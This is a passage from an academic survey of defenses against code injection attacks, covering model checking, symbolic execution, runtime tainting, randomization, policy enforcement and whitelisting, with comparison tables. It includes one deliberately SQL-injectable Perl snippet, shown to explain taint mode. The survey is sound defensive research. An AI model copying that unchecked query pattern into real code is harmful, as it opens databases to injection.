the chroot system call should be followed by a call to chdir ("/"). Otherwise, the current working directory could be outside the isolated hierarchy and provide access to a malicious user via relative paths. With a high-level representation of the system at hand and by using ad-hoc algorithms (Reps, Horwitz & Sagiv, 1995), properties like the above can be easily checked. Likewise, it is possible to state the detection of code injection defects as a reachability problem (Tsitovich, 2008). There are many tools based on model checking to detect software vulnerabilities. Classic tools include SPIN (Holzmann, 1997), SMV (McMillan, 1992) and MOPS (Chen & Wagner, 2002; Schwarz et al., 2005). These tools are representative of the approach but they do not support the detection of CIA defects. QED is a model checking system that accepts as input web application written in the standard Java servlet specification (https://jcp.org/aboutJava/communityprocess/final/jsr315/) and examine them for various code injection vulnerabilities (Martin & Lam, 2008). Also, Fehnker, Huuck & Rödiger (2011) have proposed a model checking approach to detect binary code injection defects in embedded systems. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 9/40 https://peerj.com https://jcp.org/aboutJava/communityprocess/final/jsr315/ http://dx.doi.org/10.7717/peerj-cs.136 The users of a model checking tool do not need to construct a correctness proof. Instead, they just need to enter a description of the circuit or program to be verified and the specification to be checked. Still, writing specifications is hard and code reviewers with experience are needed. One of the key features of model checking is that it can either reassure developers that the system is correct or provide them with a counterexample. As a result, together with the discover of a security issue, auditors are provided with a possible solution. A major problem in model checking is the state explosion issue (Clarke, Emerson & Sifakis, 2009; Merz, 2001). The number of all states of a system with many processes or complicated data structures can be enormous. Symbolic execution Symbolic execution generalizes testing by using unknown symbolic variables during evaluation (King, 1976; Cadar et al., 2011). In essence, it provides the means to analyze a program to determine which inputs cause each part of a program to execute. This concept can be easily adapted to detect vulnerabilities that may lead to code injection attacks. To counter SQL injection attacks, Fu & Qian (2008) have proposed SAFELI. First, SAFELI analyzes the code to detect code constructs used by the application, to interact with a database. At each location that submits an SQL query, an equation is constructed to find out the initial values that could lead to a security breach. The equation is then solved by a hybrid string solver where the solution obtained is used to construct test cases. If a defect is detected, an attack is replayed by the tool to developers. Ruse, Sarkar & Basu (2010) detect SQL injection vulnerabilities in a similar manner. In addition, Rubyx (Chaudhuri & Foster, 2010) follows a similar approach to counter JavaScript injection attacks in applications written in Ruby. S3 (Trinh, Chu & Jaffar, 2014) is a symbolic string solver that can be used to detect vulnerabilities that may lead to SQL injection and XSS attacks. To do so, it makes use of a symbolic representation so that membership in a set defined by a regular expression can be expressed as a string equation. Then, there is a constraint-based generation of instances from these expressions so that the number of instances can be limited. Saxena et al. (2010) have proposed a framework called Kudzu, to detect JavaScript injection attacks. To achieve this, Kudzu explores the application’s execution space by creating test cases. Then, like SAFELI, Kudzu uses a solver which is implemented by the authors in order to overcome the complexity of JavaScript’s string operations. Finally, by using data-flow analysis, it identifies possible defects based on specific sink rules (see ‘Data-flow analysis’). KLEE (Cadar, Dunbar & Engler, 2008) was the first symbolic execution engine introduced to detect software bugs in an efficient manner. Such bugs include defects that may lead to binary code injection attacks. In addition, MergePoint (Avgerinos et al., 2014) is a binary-only symbolic execution system for large-scale testing of commodity software. Notably, it is based on veritesting, an approach that employs the merging of execution paths during static symbolic execution, to reinforce the effects of dynamic symbolic execution. Symbolic execution has also been used together either with genetic algorithms to detect JavaScript injection attacks (Avancini & Ceccato, 2013) or with runtime tainting Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 10/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 (see ‘Runtime Tainting’) to detect SQL injection attacks (Corin & Manzano, 2012). Symbolic execution shares a similar problem with model checking (see ‘Model checking’). Symbolically executing all program paths does not scale with large programs since the number of feasible paths grows exponentially. Type system extensions A type system is a collection of rules that assign a property called a type to the various constructs of a program (Pierce, 2002). One of the most typical advantages of static type checking is the discovery of programming errors at compile time. As a result, numerous errors can then be detected immediately, rather than discovered later upon execution. For the most part, type extensions aim to overcome the problems of integrating different programming languages. For instance, the integration of SQL with the Java programming language is typically realised with the JDBC application library (Fisher, Ellis & Bruce, 2003). By using it, the programmer has to pass the SQL query to the database as a string. Thought this process, the Java compiler is completely unaware of the SQL language contained within the Java code paving the way for an SQL injection attack (recollect the example of ‘Data-flow analysis’). Type-safe programming interfaces like SQL DOM (Domain Object Model) (McClure & Krüger, 2005) and the Safe Query Objects (Cook & Rai, 2005) were two of the first attempts to detect SQL injection attacks via type extension. Both of the above mechanisms act as preprocessors and translate an SQL database schema into the host general purpose language. The generated collection of objects is used as an application library for the main application, thus ensuring type safety and syntax checking at compile-time. SQLJ (Eisenberg & Melton, 1999) is a language extension of Java that supports SQL. It offers type and syntax checking for both languages at compile-time. SugarJ (Erdweg, 2013) provides a method through which languages can be extended with specific syntax, in order to embed DSL’s. The major contribution of this framework is that can be easily applied on many languages as host languages. Currently it supports Java, Haskell and Prolog. All the aforementioned mechanisms wipe out the relationship between untyped Java strings and SQL queries, but do not address legacy code. In addition, developers require to learn a new API to use them. WebSSARI is used to verify web applications (Xie & Aiken, 2006) written in PHP. It is based on Denning’s lattice model which analyzes the information flow of a program (Denning & Denning, 1977) and uses type qualifiers to associate security classes with variables and functions that can lead to SQL injection defects. Wassermann & Su (2007) have proposed an approach that deals with static analysis and coding practices together (Wassermann & Su, 2004) to detect SQL injection attacks. Specifically, they analyze the application’s code to locate queries that are considered unsafe. To achive this, they use context free grammars and language transducers (Minamide, 2005). Type extensions is a formal way to wipe out code injection defects, but they have a distinct disadvantage: programmers need to learn new constructs and modify their code in multiple places. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 11/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Dynamic detection Dynamic detection involves the development of methods and tools to fortify such applications without actually removing the defects from the application’s code. A great number of methods that belong to this category involves some kind of dynamic program analysis (Boujarwah, Saleh & Al-Dallal, 2000). Dynamic analysis requires a running system and involves sufficient test inputs to examine the behavior of a system. Runtime tainting Runtime tainting is based on data-flow analysis (see ‘Data-flow analysis’). In practice, it enforces security policies by marking untrusted (‘‘tainted’’) data and tracing its flow through the program. Runtime tainting may be viewed as an approximation of the verification of non-interference (Von Oheimb, 2004) or the more general concept of secure information flow. Since information flow in a system cannot be verified by examining a single execution trace of the system, the results of taint analysis will necessarily reflect approximate information regarding the information flow characteristics of the system to which it is applied. Runtime tainting is a feature in some programming languages, such as Perl (http: //search.cpan.org/~rhandom/Taint-Runtime-0.03/lib/Taint/Runtime.pm) and Ruby. The following Perl code is vulnerable to SQL injection since it does not check the value of the $foo variable, which is instantiated by user input: # ! / u sr / bin / p e r l my $name = $cgi−>param ( " foo " ) ; . . . $dbh−>TaintIn = 1 ; $dbh−>e x ec u te ( " SELECT ∗ FROM u s e r s WHERE name = ’ $foo ’ ; " ) ; If taint mode is turned on, Perl would refuse to run the command and exit with an error message, because a tainted variable is being used in a query. SigFree (Wang et al., 2010) is a mechanism that follows this method to counter buffer overflow attacks by detecting the presence of malicious binary code. This is based on the fact that such attacks typically contain executable code while legitimate requests never contain executable code. However, this is not always the case and therefore the mechanism suffers from false alarms. LIFT (Qin et al., 2006) also counters binary code injection attacks in a similar manner. The system by Haldar, Chandra & Franz (2005) provides runtime tainting for applications written in Java, while the work by Xu, Bhatkar & Sekar (2006) covers applications written in C. SecuriFly (Martin, Livshits & Lam, 2005) is a similar mechanism based on PQL (http://pql.sourceforge.net/) (Program Query Language), which is a language for expressing patterns of events on objects. A dynamic checking compiler called WASC (Nanda, Lam & Chiueh, 2007) includes runtime tainting to prevent JavaScript injection attacks. To counter similar attacks, PHP Aspis (Papagiannis, Migliavacca & Pietzuch, 2011) applies partial taint tracking at the Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 12/40 https://peerj.com http://search.cpan.org/~rhandom/Taint-Runtime-0.03/lib/Taint/Runtime.pm http://search.cpan.org/~rhandom/Taint-Runtime-0.03/lib/Taint/Runtime.pm http://pql.sourceforge.net/ http://dx.doi.org/10.7717/peerj-cs.136 language level to augment values with taint meta-data in order to track their origin. Vogt et al. (2007), use runtime tainting to prevent JavaScript injection attacks. This is done by inspecting the information flow within the browser. When critical information is about to be sent to a third party, the web user decides if this should be allowed or not. Stock et al. (2014) have proposed a method that operates on the client-side too. This method uses a taint-enhanced JavaScript engine that tracks the flow of data controlled by the attacker. To detect an attack, the method uses HTML and JavaScript parsers that can identify the generation of malicious code coming from tainted data. Runtime tainting has been partially or fully used in other similar approaches (Nadji, Saxena & Song, 2009; Sekar, 2009; Nguyen-Tuong et al., 2006). Notably, such approaches may require numerous changes to the compiler or the runtime system. In positive data flow tracking, tagged data is considered to be legitimate. Information Flow Control (IFC) mechanisms employ positive taint tracking to prevent JavaScript- driven XSS attacks on the browser. Representative implementations such as JSFlow (Hedin et al., 2014), COWL (Stefan et al., 2014) and the framework by Bauer et al. (2015) allow programmers to express information flow policies by extending the type system of JavaScript. Then, the policies are checked at runtime by the JavaScript interpreter through dynamic checks. Instruction set randomization Another approach that has been previously proposed as a generic methodology to counter code injection attacks is Instruction Set Randomization (ISR) (Keromytis, 2009; Kc, Keromytis & Prevelakis, 2003). The concept behind ISR is to create an execution environment that is unique to the running process. This environment is created by using a randomization algorithm. Hence, an attack against this system will fail as the attacker cannot guess the key of this algorithm. The main issue with this approach is that it uses a cryptographic key in order to match the execution environment. As a result, security depends on the fact that malicious users cannot discover the secret key. Note that, randomization algorithms are also employed in another popular technique that has been extensively used to prevent binary code injection attacks, address space layout randomization (ASLR) (Shacham et al., 2004). To do so, ASLR randomly arranges the address space positions of critical data areas of a process such as the base of the executable and the positions of the stack and heap. SQLrand (Boyd & Keromytis, 2004) is based on ISR to detect SQL injections in the following manner: initially, it allows developers to create queries using randomized instructions instead of standard SQL keywords. The modified SQL statements are either reconstructed at runtime using the same key that is inaccessible to the attacker, or the user input is tagged with delimiters that allow an augmented SQL grammar to detect the attack. Even if SQLrand imposes a low computational overhead, it imposes an infrastructure overhead since it requires the integration of a proxy. In the case of JavaScript, consider a XOR function that encodes all JavaScript source of a web page on the server-side and then, on the client-side, the web browser decodes the source by applying the same function again. Implementations of this approach include: Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 13/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Noncespaces (Gundy & Chen, 2009) and xJS (Athanasopoulos et al., 2010). SMask (Johns & Beyerlein, 2007) identifies malicious code by automatically separating user input from legitimate code by using JavaScript and HTML keyword masking (in a way similar to SQLrand Boyd & Keromytis, 2004). Even if ISR is theoretically a sound approach for countering code injection, these implementations have flaws. For example, Noncespaces does not protect from persistent data injection. XJS does not have such problems and covers a wide variety of JavaScript injection attacks. Policy enforcement Policy enforcement is mainly associated with database security (Thuraisingham & Ford, 1995; Null & Wong, 1992; Chlipala, 2010; Son, Chaney & Thomlinson, 1998) and operating system strict access controls (Winsor, 2000; Hicks et al., 2010). In such contexts, policies expressed in specific languages (Anderson, 2005), usually limit information dissemination to authorized entities only. Currently, policy enforcement is one of the most common approaches to detect JavaScript injection attacks. In this approach, web developers define security policies on the server-side. Then, these policies are enforced either in the user’s browser or on a server-side proxy that intercepts all HTML responses. All modern browsers include a JavaScript (JS) engine to support the execution of JavaScript. Most JS engines employ restrictions like the same origin policy (Takesue, 2008) and a sandbox mechanism (Dhawan & Ganapathy, 2009). In particular, scripts run in a sandbox where they can only perform web-related actions and not general-purpose programming tasks (e.g., creating files) (Dhawan & Ganapathy, 2009). Also, scripts are constrained by the same origin policy. This policy permits scripts running on pages originating from the same site to access each other’s methods and properties with no specific restrictions, but prevents access to most methods and properties across pages on different sites (Takesue, 2008). Still, such schemes cannot stop malicious users from injecting scripts into the user’s browser. Consider a legitimate web page that does not validate the input posted by its users. By exploiting this vulnerability, an attacker can post data that will inject JavaScript into a dynamically generated page. Thus the attacker can trick a legitimate user into downloading a well-hidden script from this host in order to steal the user’s cookies. This injected script is confined by a sandboxing mechanism and conforms to the same origin policy, but it still violates the security of the browser (De Groef et al., 2012; Saiedian & Broyle, 2011). Implementations of this approach include mechanisms such as BrowserShield (Reis et al., 2006) and CoreScript (Yu et al., 2007). Both mechanisms intercept JavaScript code on a page as it executes and rewrite it in order to check if it is subject to server-provided, vulnerability descriptions. Such implementations impose a significant overhead due to the JavaScript rewriting. DSI (Nadji, Saxena & Song, 2006), MET (Erlingsson, Livshits & Xie, 2007), and BEEP (Jim, Swamy & Hicks, 2007) require source modifications by the web developers in order to introduce their policies. Specifically, in MET the security policies are specified as JavaScript functions and they are included at the top of every web page while in BEEP web developers need to write security hooks for every embedded script of the application. Blueprint (Louw & Venkatakrishnan, 2009) is a policy enforcement framework Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 14/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 that uses parsed trees to detect JavaScript injection attacks. However, to use it developers need to learn and use a new API in order to correctly escape dynamic content. Google Caja (http://code.google.com/p/google-caja/) is another policy enforcement approach provided by Google. It is based on the object-capability security model (McGraw, 2006) and it aims to control what embedded third party code can do with user data. A security layer called ‘‘Content Security Policy’’ (CSP) (Stamm, Sterne & Markham, 2010) was first introduced into Firefox to detect various types of attacks, including cross- site scripting https://developer.mozilla.org/en/Introducing_Content_Security_Policy. Currently, it is supported by almost all the available browsers. To eliminate such attacks, web site administrators must specify which domains the browser should treat as valid sources of script and which not. Then, the browser will only execute scripts that exist in source files from white-listed domains. Notably, AutoCSP (Fazzini, Saxena & Orso, 2015) and deDacota (Doupé et al., 2013) are two schemes that are based on CSP. Apart from JavaScript injection attacks, policy enforcement has been also used to detect binary code injection attacks. Specifically, Kiriansky, Bruening & Amarasinghe (2002) have proposed program shepherding which monitors control flow transfers in order to restrict execution privileges based on code origins and ensure that program sandboxing will not be breached. In a similar manner, Control-flow Integrity (CFI) (Abadi et al., 2005), follows a predetermined flow graph that serves as a specification of control transfers allowed in the program. Then, at runtime, specific checks enforce this specification. Adaptations of CFI include Control-Pointer Integrity (CPI) (Kuznetsov et al., 2014) and Cryptographically Enforced Control Flow Integrity (CCFI) (Mashtizadeh et al., 2015). The former ensures the integrity of all pointers in a program (e.g., function pointers) and as a result prevents different attacks. The latter employs Message Authentication Codes (MACs) to protect elements such as return addresses and function pointers. In general, CFI implementations track control edges separately, without taking into account the context of preceding edges. Context-sensitive CFI (Van der Veen et al., 2015) provides enhanced security by considering the backward and forward edges of the graph too. Notably, there is a number of attempts to overcome CFI. For instance, Göktas et al. (2014) have indicated that CFI can be bypassed by using return oriented programming (ROP) (Buchanan et al., 2008). Through ROP, attackers can gain control of the call stack to hijack program control flow. To do so, they execute specific machine instruction sequences that are already presented in machine’s memory. Whitelisting Whitelisting approaches are based on the features of Denning’s original intrusion detection framework (Denning, 1987). In the code injection context, a whitelisting mechanism registers all valid benign code statements during a learning phase. This can be done in various ways according to the implementation. Then, only those will be accepted, approved or recognized during production. JavaScript injection whitelisting approaches generate and store valid JavaScript code in various forms, and detect attacks as outliers from the set of valid code statements. SWAP (Wurzinger et al., 2009) registers all the benign scripts that exist in the original application Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 15/40 https://peerj.com http://code.google.com/p/google-caja/ https://developer.mozilla.org/en/Introducing_Content_Security_Policy http://dx.doi.org/10.7717/peerj-cs.136 and stores an identifier for every benign script. Then, a JavaScript detection component placed in a proxy searches for malicious scripts in the server’s responses. If no malicious scripts are detected, the proxy forwards the response to the client-side. Note that, this approach is inflexible since it does not support dynamic scripts. Similar limitations exist in XSS-GUARD (Bisht & Venkatakrishnan, 2008), which maps benign scripts to HTTP responses. To support dynamic scripts during the creation of the legitimate identifiers the authors of XSSDS (Johns, Engelmann & Posegga, 2008) substitute string-tokens with specified identifiers. In the case of DSL-driven injection attacks the various countermeasures follow a similar pattern. DIDAFIT (Lee, Low & Wong, 2002) detects SQL injection attacks by registering all benign database transactions. Subsequent improvements by Valeur, Mutz & Vigna (2005) tagged each benign transaction with the corresponding web application. To do so, they have extended their anomaly detection framework called libAnomaly (http: //seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/). Furthermore, AMNESIA (Halfond & Orso, 2005b; Halfond & Orso, 2006) is a tool that detects SQL injection attacks by associating a query model with the location of every query in the web application. Then in production mode, monitors the execution of the application to examine when queries diverge from the expected model. SQLGuard (Buehrer, Weide & Sivilotti, 2005) is another mechanism that detects SQL injection attacks based on parse tree validation. In particular, the mechanism compares the parse tree of the query before the inclusion of user input with the one resulting after the inclusion of user input. If the trees diverge, the application is probably under attack. Diglossia (Son, McKinley & Shmatikov, 2013) also uses parse trees to detect code injection attacks. The main idea behind Diglossia is based on the theory introduced by Ray and Ligatti in reference (Ray & Ligatti, 2012). Apart from SQL injection attacks, it can also be used to detect another emerging type of attacks: NoSQL (Chodorow & Dirolf, 2010) injection attacks (see also ‘Emerging Challenges’). SDriver (Mitropoulos & Spinellis, 2009; Mitropoulos, Karakoidas & Spinellis, 2009; Mitropoulos et al., 2011) is a mechanism that prevents SQL and XPath injection attacks against web applications by using location- specific signatures. The signatures are generated during a learning phase, and are based on elements that can depend either on the query or on its execution environment (for example the stack trace). Then, during production, the mechanism checks all queries for compliance and can block queries containing injected elements. By associating a stack trace with the origin of a query, the mechanism can correlate SQL statements with their call sites. This increases the specificity of the stored signatures and avoids false alarms. nSign (Mitropoulos et al., 2016) and SICILIAN (Soni, Budianto & Saxena, 2015) follow the same approach as SDriver to prevent XSS attacks on the client-side. To do so, nSign includes script origins and the type of a script as environment elements, and JavaScript keywords and their number of appearance as elements coming from the code that is about to be executed. SICILIAN on the other side, includes more elements from the script (class names, variavle names and more) and less from the environment. Laranjeiro et al. (Laranjeiro, Vieira & Madeira, 2009; Antunes et al., 2009; Laranjeiro, Vieira & Madeira, 2010) have proposed a similar mechanism to detect both SQL and Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 16/40 https://peerj.com http://seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/ http://seclab.cs.ucsb.edu/academic/projects/projects/libanomaly/ http://dx.doi.org/10.7717/peerj-cs.136 1Also known in statistics as type I and type Ii errors (Peck & Devore, 2010). Xpath injection attacks in Web services. When it is not possible to run a complete learning phase, a set of heuristics is used by the mechanism to accept or discard doubtful cases. Finally, Mattos, Santin & Malucelli (2013) developed an signature-based attack detection engine that utilizes ontologies to counter XML and Xpath injection attacks. By using ontologies to model data provides explicit and formal semantic relationships between data and possible attacks. ANALYSIS AND DISCUSSION We have analyzed the mechanisms described earlier based on the requirements mentioned in ‘Introduction and Covered Area’. Tables 1 and 2 illustrate the comparison summaries of the static and dynamic countermeasures. Flexibility Flexibility indicates if an approach can be adjusted in order to detect different attacks categories. Typically, all approaches, except for lexical analysis have been used to detect various code defects. As we described earlier, lexical analysis is a simplistic approach that cannot be used to identify source code-driven injection attacks. Even if a corresponding tool existed, the false alarms would be far too many. This is because source code-driven injection attacks are language independent (see ‘Introduction and Covered Area’) and lexical analysis can only search for specific keywords or sequences of keywords. As a result, it is only used to detect code constructs that can lead to binary code injection attacks. In all other cases, the approaches are flexible and they can be used to deal with different kinds of attacks. For instance, policy enforcement is a method that seems to be tailored to prevent JavaScript injection attacks since it involves the interaction of two entities: the client’s browser and the server-side application (policies are set to the browser and are enforced on the client-side). Notably, it can be also successfully employed to detect binary code injection via CFI mechanisms. Effectiveness tests The effectiveness of security mechanisms can be judged by the existence of incorrect data,1 namely: false positives (FP) and false negatives (FN). Specifically, a FP is a result that indicates that an attack is taking place, when it has not. A FN occurs when an attack actually takes place, and the mechanism fails to detect it. In Tables 1 and 2, we show if the researchers have performed any tests to evaluate the effectiveness of their proposed mechanisms in terms of FPs and FNs. If this is the case we put a tick mark (4). If no tests were performed we put an X mark (7). We see that there are many cases where no such tests were performed: 4 out of 17 in the case of static analysis and 12 our of 41 in the case of dynamic detection. A reasonable argument for the latter case, would be that defenses like JSFlow (Hedin et al., 2014), COWL (Stefan et al., 2014) do not need to be fully validated through testing, because they provide systematic arguments as to why their design is secure. In order for this to stand though, their implementation should closely follow its specification, which may not be the case in practical terms. Going one step further, we observed that there were cases such as XSS-GUARD (Bisht & Venkatakrishnan, 2008) and the system by Valeur, Mutz & Vigna (2005), where researchers Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 17/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Table 1 Static Analysis: Comparison summary of tools designed to detect vulnerabilities that can lead to a code injection attack. Approach Flexibilitya Mechanism Requirements Attack vector Effectiveness testsb Implementation independencec Computational overheadd ITS4 (Viega et al., 2002; Viega et al., 2000) 4 7(C) ¬ binary code PScan (Heffley & Meunier, 2004) 4 7(C) ¬ binary code Flawfinder (Wilander & Kamkar, 2002) 4 7(C) ¬ binary code RATS (Chess & McGraw, 2004) 4 4 ¬ binary code Lexical analysis 7 BOON (Wagner et al., 2000) 4 7(C) ¬ binary code CodeSurfer (Anderson & Zarins, 2005; Nagy & Mancoridis, 2009) 4 4 ¬ binary code Splint (Evans & Larochelle, 2002) 4 7(C) ¬ binary code Livshits & Lam (2005) 4 7(Java) ¬ SQL, JavaScript FindBugs (Ayewah & Pugh, 2010; Hovemeyer & Pugh, 2007; Spacco, Hovemeyer & Pugh, 2006) 4 7(Java) ¬ SQL, JavaScript Pixy (Jovanovic, Kruegel & Kirda, 2006) 4 4 ¬ SQL, JavaScript XSSdetect 4 4 ¬ JavaScript Data-Flow Analysis 4 Dahse & Holz (2014) 4 4 ¬ SQL, JavaScript QED (Martin & Lam, 2008) 4 7(Java) ¬ SQL, JavaScript Model Checking 4 Fehnker, Huuck & Rödiger (2011) 4 7(C) ¬ binary code SAFELI (Fu & Qian, 2008) 4 4 ¬ SQL KLEE (Cadar, Dunbar & Engler, 2008) 4 7(C) ¬ binary code Kudzu [139] 4 4 ¬ JavaScript Rubyx (Chaudhuri & Foster, 2010) 4 7(Ruby) ¬ JavaScript MergePoint (Avgerinos et al., 2014) 7 7(C) ¬ binary code Symbolic Execu- tion 4 S3 (Trinh, Chu & Jaffar, 2014) 4 4 ¬ SQL, JavaScript SQL DOM (McClure & Krüger, 2005) 7 4 20% SQL Safe Query Objects (Cook & Rai, 2005) 7 7(Java) ? SQL SQLJ (Eisenberg & Melton, 1999) 4 7(Java) ? SQL SugarJ (Erdweg, 2013; Erdweg et al., 2011) 7 4 ? SQL, XML Wassermann & Su (2007) 4 4 7 SQL Type system extensions 4 WebSSARI (Xie & Aiken, 2006) 4 7(PHP) 98.4% SQL Notes. aFlexibility indicates if the approach can be adjusted in order to detect different categories. bEffectiveness Tests. This column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cImplementation Independence indicates if the static analysis mechanism is tailored to a specific programming language. dComputational Overhead. This column shows the runtime overhead that the mechanism may add to the application. In the context of static analysis this can be measured in the case of the type system extension approach. Note that the different results does not necessarily indicate that one mechanism is more effective than the other. This is because most of them were evaluated under different assumptions and settings. Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 18/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Table 2 Dynamic Detection: Comparison summary of mechanisms developed to counter code injection attacks. Approach Flexibilitya Mechanism Requirements Attack vector Effectiveness testsb Implementation independencec Computational overheadd SigFree (Wang et al., 2010) 4 7(C) 10% binary code LIFT (Qin et al., 2006) 4 4 6.2% binary code Haldar, Chandra & Franz (2005) 7 7(Java) 7 SQL SecuriFly (Martin, Livshits & Lam, 2005) 4 7(Java) 9–125% SQL, JavaScript Xu, Bhatkar & Sekar (2006) 4 4 76% SQL, JavaScript WASC (Nanda, Lam & Chiueh, 2007) 4 4 30% JavaScript PHPAspis (Papagiannis, Migli- avacca & Pietzuch, 2011) 4 7(PHP) 2.2× SQL, JavaScript, PHP Stock et al. (2014) 4 4 JavaScript Vogt et al. (2007) 4 4 ? JavaScript JSFlow (Hedin et al., 2014) ? 4 2× JavaScript COWL (Stefan et al., 2014) 7 4 16% SQL, JavaScript Runtime tainting 4 Bauer et al. (2015) ? 4 55% JavaScript SQLrand (Boyd & Keromytis, 2004) 7 4 6.5ms SQL SMask (Johns & Beyerlein, 2007) 4 4 ? SQL, JavaScript Noncespaces (Gundy & Chen, 2009) 4 4 10.3% JavaScriptISR 4 xJS (Athanasopoulos et al., 2010) 4 4 1.6–40ms JavaScript DSI (Nadji, Saxena & Song, 2006) 4 4 1.85% JavaScript BrowserShield (Reis et al., 2006) 4 4 8% JavaScript Blueprint (Louw & Venkatakrish- nan, 2009) 4 4 13.6% JavaScript CoreScript (Yu et al., 2007) 7 4 ? JavaScript MET (Erlingsson, Livshits & Xie, 2007) 7 4 ? JavaScript BEEP (Jim, Swamy & Hicks, 2007) 4 4 14.4% JavaScript CSP (Stamm, Sterne & Markham, 2010) 7 4 ? JavaScript Google Caja 7 4 ? JavaScript Kiriansky, Bruening & Amaras- inghe, (2002) ? 7 ∼1% binary code CFI (Abadi et al., 2005; Van der Veen et al., 2015) 7 7(C) 0.09–26.78% binary code CPI (Kuznetsov et al., 2014) 4 7(C) 2.9–8.4% binary code Policy enforcement 4 CCFI (Mashtizadeh et al., 2015) 4 7(C) 3–18% binary code (continued on next page) Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 19/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 Table 2 (continued) Approach Flexibilitya Mechanism Requirements Attack vector Effectiveness testsb Implementation independencec Computational overheadd AMNESIA (Halfond & Orso, 2005b; Halfond & Orso, 2006; Halfond & Orso, 2005a) 4 4 ? SQL DIDAFIT (Lee, Low & Wong, 2002) 4 4 ? SQL (Valeur, Mutz & Vigna (2005) 4 4 1ms SQL SQLGuard (Buehrer, Weide & Sivilotti, 2005) 7 4 3% SQL Diglossia (Son, McKinley & Shmatikov, 2013) 4 4 13% SQL, NoSQL SDriver (Mitropoulos & Spinellis, 2009; Mitropoulos, Karakoidas & Spinellis, 2009; Mitropoulos et al., 2011) 4 4 39% SQL, Xpath nSign (Mitropoulos et al., 2016) 4 4 11.1% JavaScript SICILIAN (Soni, Budianto & Saxena, 2015) 4 4 7.02% JavaScript Laranjeiro et al. (Laranjeiro, Vieira & Madeira, 2009; Antunes et al., 2009; Laranjeiro, Vieira & Madeira, 2010) 4 4 7 SQL, Xpath Mattos, Santin & Malucelli (2013) 4 4 ? XML, Xpath SWAP (Wurzinger et al., 2009) 4 4 ∼180% JavaScript XSSDS (Johns, Engelmann & Posegga, 2008) 4 4 ? JavaScript Whitelisting 4 XSS-GUARD (Bisht & Venkatakrishnan, 2008) 4 4 5–24% JavaScript Notes. aFlexibility indicates if the approach can be adjusted in order to detect different categories. bEffectiveness Tests. This column shows if the researchers performed any tests regarding the effectiveness of their mechanism in terms of false positive and negative results. cImplementation Independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. dComputational Overhead. This column shows the runtime overhead that the mechanism may add to the application. Note that the different results do not necessarily indicate that one mechanism is more effective than the other. This is because most of them were evaluated under different assumptions and settings. performed tests to measure false alarms but they did not look for false negatives. Notably, we observed that there are mechanisms that even if they seem effective, their testing might be really poor contrary to other schemes that may have false alarms, but have been tested thoroughly. For example, Blueprint appears to be an effective solution to detect JavaScript injection attacks, but the corresponding publication includes only two test cases. On the other hand, Dsi appears to have false positives and negatives, but it was evaluated on a set of 5,328 vulnerable web sites. An interesting observation involves the mechanisms that detect JavaScript injection attacks. Unfortunately, most countermeasures, even if the corresponding publications state that they are accurate, are actually vulnerable to attacks that involve non-HTML elements (except for Athanasopoulos et al., 2010). For instance, there are browsers that Mitropoulos and Spinellis (2017), PeerJ Comput. Sci., DOI 10.7717/peerj-cs.136 20/40 https://peerj.com http://dx.doi.org/10.7717/peerj-cs.136 treat PostScript files as HTML. A malicious user can embed a script within a PostScript file, upload it as a valid document and then use it to trigger the attack (Barth, Caballero & Song, 2009) (also see the Appendix). Since most mechanisms require the presence of a Document Object Model Dom tree to detect an attack, in this case they will fail. Notably, there are cases where the effectiveness of some mechanisms have been questioned. For example, Sovarel, Evans & Paul (2005) have examined the effectiveness of ISR and showed that an attacker may be able to circumvent the approach by determining the randomization key. Furthermore, their results indicate that doing ISR in a way that provides a certain degree of security against a motivated malicious user is not as easy as previously thought. In the same manner, Zitser, Lippmann & Leek (2004) and Wilander & Kamkar (2002), have extensively tested and questioned some of the aforementioned tools that detect binary code injection attacks. Implementation independence In the case of static analysis mechanisms, implementation independence indicates if a mechanism is developed based upon a specific programming language. For instance, all lexical analysis tools except for Rats, only analyze applications written in the C programming language. Still, Rats, which can be used on other languages, does not find code injection vulnerabilities in any other language except for C. In the same manner, SQLJ can only be used by Java developers. In every case, we list the corresponding language. In the dynamic detection context, implementation independence shows if the mechanism depends either on the characteristics of the programming language that was used to develop it or on the implementation details of the protecting entity. For instance, PHP Aspis can detect various forms of CIAs that target applications written in PHP only. In the same manner, CFI mechanisms can only protect programs written in C. Computational overhead The user’s experience is affected if a mechanism suffers from runtime overhead. Take for example a mechanism from the dynamic detection category. If this mechanism adds significant overhead to the applications functionality, the application’s owner would consider it useless. In the static analysis context, this can be measured in the case of the type system extension approach since their use affects the application overall. In the table we list the overhead for every mechanism as stated in the original publication. If the publication mentions that the mechanism suffers from a runtime overheard but does not explicitly state the occurring overhead we use the X mark (7). If the authors did not measure the overhead we use a question mark (?). Note though that each number is an indication that has been computed under different assumptions and settings and it cannot be used to compare mechanisms directly (especially the ones coming from different categories). However, in cases like nSign and SICILIAN, this could be meaningful because both are mechanisms that wrap up the JavaScript engine of a browser. Hence, both overheads are imposed on the execution time of the engine. Note that the overhead is displayed in different manners (e.g., percentages, absolute numbers and more). In 